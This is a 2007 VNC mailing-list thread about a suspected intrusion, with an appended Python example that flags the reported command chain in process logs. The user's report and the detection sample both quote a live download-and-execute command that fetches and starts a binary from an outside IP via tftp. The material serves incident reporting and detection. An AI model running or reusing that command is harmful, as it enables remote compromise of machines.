RE: intrusion?
From: James W. <jn...@re...> - 2007-04-13 10:29:40
Eusebio,

From what you've described, it sounds like the problem has nothing to do with TightVNC or VNC, and that it's most likely to do with some vulnerability in your apache setup.

I'd recommend that you run a full virus-scan of the system at this point, since it's quite possible (and likely) that there are other bits of software on the affected system that have been placed there by the attacker, and which may still be able to provide them with remote access to it.

Cheers,

Wez @ RealVNC Ltd

> -----Original Message-----
> From: vnc...@li... [mailto:vnc...@li...] On Behalf Of Eusebio
> Sent: 13 April 2007 10:58
> To: Constantin Kaplinsky
> Cc: vnc...@li...
> Subject: Re: intrusion?
>
> First of all, thanks for your interest and for your reply
>
> I have been finding it out, and could see it in front of me, in action, several times
>
> My conclusions are:
> That thing sends keyboard codes to open 'Start menu' and try to open a cmd window to execute that tftp, download a prog and execute it
>
> Other times it opened 'task manager', kill some process and open others (really fast, everything in one or 2 seconds, I couldn't see anything)
>
> I think that VNC is involved only because it was at the start menu, like any other frequently used program in XP
>
> So, first thing I did was to erase the 'C:\WINDOWS\system32\tftp.exe' prog (a simple ftp), and I could see the intrusion failing
> And since I closed tcp port 80 in my router (opened for my apache server) I have never seen it again.
>
> So, good news, I think VNC is as vulnerable as any other prog that accepts keyboard inputs and is used frequently
>
> Thanks and regards
> Eusebio
>
> On 4/13/07, Constantin Kaplinsky <co...@ti...> wrote:
> > Hello,
> >
> > >>>>> Eusebio wrote:
> > > My pc (xp pro sp2) is usually on and connected, and I often use tight-vnc, everything OK till I found this (see image)
> > >
> > > Someone executed this code: %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 64.79.213.12 GET jijrtyw.exe & start jijrtyw&
> > >
> > > as a server address in 'TightVNC Viewer', appears an error message: "Failed to get server address"
> > >
> > > but a cmd.exe window was open and that code was executed
> >
> > I'm trying to investigate this issue, but I do not understand yet how that could be possible.
> >
> > Do you have other VNC versions installed? Specifically, could it be possible that you run RealVNC's version 4.1.1?
> >
> > While searching the Internet, I was able to find a number of reports similar to this one (even the IP address was the same in many cases), but what was strange is that versions and distributions of VNC software were different in different reports - TightVNC, UltraVNC, VNC4.
> >
> > Another strange thing is that VNC viewer is involved, while VNC server is needed to connect to the machine. Are both server and viewer vulnerable? -- I think that's not likely. Looks very strange...
> >
> > --
> > With Best Wishes,
> > Constantin
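The chain Eusebio quotes above (a shell launched with `%comspec% /c`, a `tftp -i ... GET` of a binary, then `start` to run it) is the kind of thing an endpoint's process-creation log can be scored for. The following is an added example, not code from this thread or from any VNC project: the record format is a hypothetical simplification of a process-creation event, the benign records are constructed, and the third record is the command line quoted in the report.

```python
import re

# Constructed sample of process-creation records in a hypothetical
# "<timestamp> <user> <command line>" layout. The third record is the
# command line quoted in the thread; the others are benign filler.
SAMPLE_EVENTS = [
    "2007-04-13T09:58:01 eusebio C:\\WINDOWS\\system32\\notepad.exe notes.txt",
    "2007-04-13T09:58:07 eusebio tftp -i 10.0.0.5 PUT config.bak",
    "2007-04-13T09:58:12 eusebio %comspec% /c echo Repairing user32.dll & echo Please wait... "
    "& tftp -i 64.79.213.12 GET jijrtyw.exe & start jijrtyw&",
    "2007-04-13T09:58:30 eusebio cmd.exe /c dir C:\\",
]

# Pieces of the reported chain. Each one alone is common on a workstation;
# it is their combination in a single command line that is suspicious.
SHELL_PREFIX = re.compile(r"^(?:%comspec%|cmd(?:\.exe)?)\s+/c\b", re.IGNORECASE)
TFTP_GET = re.compile(r"\btftp(?:\.exe)?\s+(-i\s+)?(\S+)\s+GET\s+(\S+)", re.IGNORECASE)
START_EXEC = re.compile(r"&\s*start\s+([^\s&]+)", re.IGNORECASE)


def score_command(cmdline):
    """Return (score, reasons): one point per chain element found in cmdline."""
    reasons = []
    if SHELL_PREFIX.search(cmdline):
        reasons.append("shell launched with /c")
    m = TFTP_GET.search(cmdline)
    if m:
        reasons.append(f"tftp GET {m.group(3)} from {m.group(2)}")
        if m.group(1):
            reasons.append("binary (-i) transfer")
    s = START_EXEC.search(cmdline)
    if s:
        reasons.append(f"start {s.group(1)} chained after the transfer")
    return len(reasons), reasons


def find_download_exec(events, min_score=2):
    """Return [(timestamp, user, score, reasons)] for records at or above min_score.

    A plain tftp PUT or a bare 'cmd /c dir' scores below the threshold; the
    download-then-start chain from the report scores 4.
    """
    hits = []
    for line in events:
        ts, user, cmd = line.split(" ", 2)
        score, reasons = score_command(cmd)
        if score >= min_score:
            hits.append((ts, user, score, reasons))
    return hits
```

Tuning `min_score` trades noise for coverage; a site with no legitimate `tftp` use could reasonably alert on the GET alone.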